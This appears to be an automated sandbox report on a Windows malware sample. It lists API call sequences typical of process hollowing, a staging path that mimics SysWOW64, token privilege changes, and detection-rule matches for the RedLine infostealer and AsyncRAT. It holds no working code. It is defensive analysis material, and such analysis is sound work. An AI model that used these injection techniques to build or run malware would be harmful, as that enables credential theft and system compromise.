Source: C:\Users\Public\alpha.pif Code function: 17_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 17_2_00014E3B
Source: C:\Users\Public\alpha.pif Code function: 17_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 17_2_00024759
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C8670 NtUnmapViewOfSection, 27_2_029C8670
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C8400 NtReadVirtualMemory, 27_2_029C8400
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C7A2C NtAllocateVirtualMemory, 27_2_029C7A2C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C7D78 NtWriteVirtualMemory, 27_2_029C7D78
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 27_2_029C8D70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 27_2_029CDD70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C86F7 NtUnmapViewOfSection, 27_2_029C86F7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C7AC9 NtAllocateVirtualMemory, 27_2_029C7AC9
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C7A2A NtAllocateVirtualMemory, 27_2_029C7A2A
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029CDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 27_2_029CDBB0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029CDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 27_2_029CDC8C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029CDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 27_2_029CDC04
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 27_2_029C8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 27_2_029C8D6E
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E8670 NtUnmapViewOfSection, 36_2_029E8670
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E8400 NtReadVirtualMemory, 36_2_029E8400
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E7A2C NtAllocateVirtualMemory, 36_2_029E7A2C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E7D78 NtWriteVirtualMemory, 36_2_029E7D78
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 36_2_029E8D70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029EDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 36_2_029EDD70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E86F7 NtUnmapViewOfSection, 36_2_029E86F7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E7AC9 NtAllocateVirtualMemory, 36_2_029E7AC9
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E7A2A NtAllocateVirtualMemory, 36_2_029E7A2A
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029EDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 36_2_029EDBB0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029EDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 36_2_029EDC8C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029EDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 36_2_029EDC04
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: 36_2_029E8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 36_2_029E8D6E
Source: C:\Users\Public\alpha.pif Code function: 13_2_00014C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z, 13_2_00014C10
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B08788 CreateProcessAsUserW, 4_2_02B08788
Source: C:\Users\Public\alpha.pif File created: C:\Windows
Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin
Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02AF44DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02B089D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02AF4500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02AF4860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02B0894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02AF46D4 appears 244 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: String function: 029D4860 appears 683 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: String function: 029E894C appears 50 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: String function: 029D46D4 appears 155 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: String function: 029B4860 appears 683 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: String function: 029B46D4 appears 155 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: String function: 029C894C appears 50 times
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: String function: 0040E1D8 appears 129 times
Source: Acrobat.exe.12.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.12.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.12.dr Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: setup.exe0.12.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe0.12.dr Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: ie_to_edge_stub.exe.12.dr Static PE information: Number of sections : 11 > 10
Source: identity_helper.exe.12.dr Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe0.12.dr Static PE information: Number of sections : 12 > 10
Source: chrmstp.exe.12.dr Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe.12.dr Static PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.12.dr Static PE information: Number of sections : 14 > 10
Source: setup.exe1.12.dr Static PE information: Number of sections : 13 > 10
Source: chrome_pwa_launcher.exe.12.dr Static PE information: Number of sections : 13 > 10
Source: setup.exe0.12.dr Static PE information: Number of sections : 14 > 10
Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Acrobat.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: appvcleaner.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVShNotify.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IntegratedOffice.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
